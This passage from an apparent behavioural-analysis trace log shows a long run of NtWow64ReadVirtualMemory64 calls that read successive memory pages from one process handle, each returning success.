NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b34000, Buffer=0x7ffb, BufferSize=0xac4000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.180] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b35000, Buffer=0x7ffb, BufferSize=0xac5000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.181] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b36000, Buffer=0x7ffb, BufferSize=0xac6000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.181] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b37000, Buffer=0x7ffb, BufferSize=0xac7000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.181] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b38000, Buffer=0x7ffb, BufferSize=0xac8000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.181] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b39000, Buffer=0x7ffb, BufferSize=0xac9000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.181] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b3a000, Buffer=0x7ffb, BufferSize=0xaca000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.182] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b3b000, Buffer=0x7ffb, BufferSize=0xacb000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.182] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b3c000, Buffer=0x7ffb, BufferSize=0xacc000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.182] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b3d000, Buffer=0x7ffb, BufferSize=0xacd000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.182] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b3e000, Buffer=0x7ffb, BufferSize=0xace000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.182] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b3f000, Buffer=0x7ffb, BufferSize=0xacf000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.183] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b40000, Buffer=0x7ffb, BufferSize=0xad0000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.183] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b41000, Buffer=0x7ffb, BufferSize=0xad1000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.183] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b42000, Buffer=0x7ffb, BufferSize=0xad2000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.184] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b43000, Buffer=0x7ffb, BufferSize=0xad3000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.184] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b44000, Buffer=0x7ffb, BufferSize=0xad4000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.184] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b45000, Buffer=0x7ffb, BufferSize=0xad5000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.184] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b46000, Buffer=0x7ffb, BufferSize=0xad6000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.184] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b47000, Buffer=0x7ffb, BufferSize=0xad7000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.185] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b48000, Buffer=0x7ffb, BufferSize=0xad8000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.185] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b49000, Buffer=0x7ffb, BufferSize=0xad9000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.185] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b4a000, Buffer=0x7ffb, BufferSize=0xada000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.185] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b4b000, Buffer=0x7ffb, BufferSize=0xadb000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.186] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b4c000, Buffer=0x7ffb, BufferSize=0xadc000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.186] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b4d000, Buffer=0x7ffb, BufferSize=0xadd000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.186] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b4e000, Buffer=0x7ffb, BufferSize=0xade000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.186] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b4f000, Buffer=0x7ffb, BufferSize=0xadf000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.187] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b50000, Buffer=0x7ffb, BufferSize=0xae0000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.187] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b51000, Buffer=0x7ffb, BufferSize=0xae1000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.187] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b52000, Buffer=0x7ffb, BufferSize=0xae2000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.187] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b53000, Buffer=0x7ffb, BufferSize=0xae3000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.187] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b54000, Buffer=0x7ffb, BufferSize=0xae4000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.188] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b55000, Buffer=0x7ffb, BufferSize=0xae5000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.188] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b56000, Buffer=0x7ffb, BufferSize=0xae6000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.188] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b57000, Buffer=0x7ffb, BufferSize=0xae7000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.188] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b58000, Buffer=0x7ffb, BufferSize=0xae8000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.188] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b59000, Buffer=0x7ffb, BufferSize=0xae9000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.189] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b5a000, Buffer=0x7ffb, BufferSize=0xaea000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.189] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b5b000, Buffer=0x7ffb, BufferSize=0xaeb000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.189] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b5c000, Buffer=0x7ffb, BufferSize=0xaec000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.189] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b5d000, Buffer=0x7ffb, BufferSize=0xaed000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.190] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b5e000, Buffer=0x7ffb, BufferSize=0xaee000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.190] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b5f000, Buffer=0x7ffb, BufferSize=0xaef000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.190] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b60000, Buffer=0x7ffb, BufferSize=0xaf0000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.190] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b61000, Buffer=0x7ffb, BufferSize=0xaf1000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.190] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b62000, Buffer=0x7ffb, BufferSize=0xaf2000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.191] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b63000, Buffer=0x7ffb, BufferSize=0xaf3000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.191] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b64000, Buffer=0x7ffb, BufferSize=0xaf4000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.191] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b65000, Buffer=0x7ffb, BufferSize=0xaf5000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.191] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b66000, Buffer=0x7ffb, BufferSize=0xaf6000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.192] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b67000, Buffer=0x7ffb, BufferSize=0xaf7000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.192] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b68000, Buffer=0x7ffb, BufferSize=0xaf8000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.192] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b69000, Buffer=0x7ffb, BufferSize=0xaf9000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.192] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b6a000, Buffer=0x7ffb, BufferSize=0xafa000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.193] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b6b000, Buffer=0x7ffb, BufferSize=0xafb000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.193] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b6c000, Buffer=0x7ffb, BufferSize=0xafc000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.193] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b6d000, Buffer=0x7ffb, BufferSize=0xafd000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.194] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b6e000, Buffer=0x7ffb, BufferSize=0xafe000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.194] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b6f000, Buffer=0x7ffb, BufferSize=0xaff000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.194] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b70000, Buffer=0x7ffb, BufferSize=0xb00000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.195] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b71000, Buffer=0x7ffb, BufferSize=0xb01000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.195] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b72000, Buffer=0x7ffb, BufferSize=0xb02000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.195] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b73000, Buffer=0x7ffb, BufferSize=0xb03000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.195] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b74000, Buffer=0x7ffb, BufferSize=0xb04000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.196] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b75000, Buffer=0x7ffb, BufferSize=0xb05000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.196] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b76000, Buffer=0x7ffb, BufferSize=0xb06000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.196] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b77000, Buffer=0x7ffb, BufferSize=0xb07000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.197] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b78000, Buffer=0x7ffb, BufferSize=0xb08000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.197] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b79000, Buffer=0x7ffb, BufferSize=0xb09000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.197] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b7a000, Buffer=0x7ffb, BufferSize=0xb0a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.197] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b7b000, Buffer=0x7ffb, BufferSize=0xb0b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.198] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b7c000, Buffer=0x7ffb, BufferSize=0xb0c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.198] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b7d000, Buffer=0x7ffb, BufferSize=0xb0d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.198] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b7e000, Buffer=0x7ffb, BufferSize=0xb0e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.198] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b7f000, Buffer=0x7ffb, BufferSize=0xb0f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.198] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b80000, Buffer=0x7ffb, BufferSize=0xb10000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.199] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b81000, Buffer=0x7ffb, BufferSize=0xb11000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.199] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b82000, Buffer=0x7ffb, BufferSize=0xb12000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.199] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b83000, Buffer=0x7ffb, BufferSize=0xb13000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.200] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b84000, Buffer=0x7ffb, BufferSize=0xb14000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.200] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b85000, Buffer=0x7ffb, BufferSize=0xb15000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.200] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b86000, Buffer=0x7ffb, BufferSize=0xb16000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.200] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b87000, Buffer=0x7ffb, BufferSize=0xb17000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.201] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b88000, Buffer=0x7ffb, BufferSize=0xb18000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.201] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b89000, Buffer=0x7ffb, BufferSize=0xb19000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.201] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b8a000, Buffer=0x7ffb, BufferSize=0xb1a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.201] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b8b000, Buffer=0x7ffb, BufferSize=0xb1b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.201] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b8c000, Buffer=0x7ffb, BufferSize=0xb1c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.202] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b8d000, Buffer=0x7ffb, BufferSize=0xb1d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.202] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b8e000, Buffer=0x7ffb, BufferSize=0xb1e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.583] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b8f000, Buffer=0x7ffb, BufferSize=0xb1f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.583] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b90000, Buffer=0x7ffb, BufferSize=0xb20000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.583] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b91000, Buffer=0x7ffb, BufferSize=0xb21000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.583] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b92000, Buffer=0x7ffb, BufferSize=0xb22000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.584] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b93000, Buffer=0x7ffb, BufferSize=0xb23000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.584] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b94000, Buffer=0x7ffb, BufferSize=0xb24000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.584] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b95000, Buffer=0x7ffb, BufferSize=0xb25000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.584] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b96000, Buffer=0x7ffb, BufferSize=0xb26000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.584] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b97000, Buffer=0x7ffb, BufferSize=0xb27000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.585] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b98000, Buffer=0x7ffb, BufferSize=0xb28000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.585] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b99000, Buffer=0x7ffb, BufferSize=0xb29000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.585] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b9a000, Buffer=0x7ffb, BufferSize=0xb2a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.585] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b9b000, Buffer=0x7ffb, BufferSize=0xb2b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.585] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b9c000, Buffer=0x7ffb, BufferSize=0xb2c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.586] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b9d000, Buffer=0x7ffb, BufferSize=0xb2d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.586] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b9e000, Buffer=0x7ffb, BufferSize=0xb2e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.586] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b9f000, Buffer=0x7ffb, BufferSize=0xb2f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.586] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28ba0000, Buffer=0x7ffb, BufferSize=0xb30000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.586] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28ba1000, Buffer=0x7ffb, BufferSize=0xb31000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.587] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28ba2000, Buffer=0x7ffb, BufferSize=0xb32000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.587] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28ba3000, Buffer=0x7ffb, BufferSize=0xb33000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.587] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28ba4000, Buffer=0x7ffb, BufferSize=0xb34000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.587] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28ba5000, Buffer=0x7ffb, BufferSize=0xb35000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 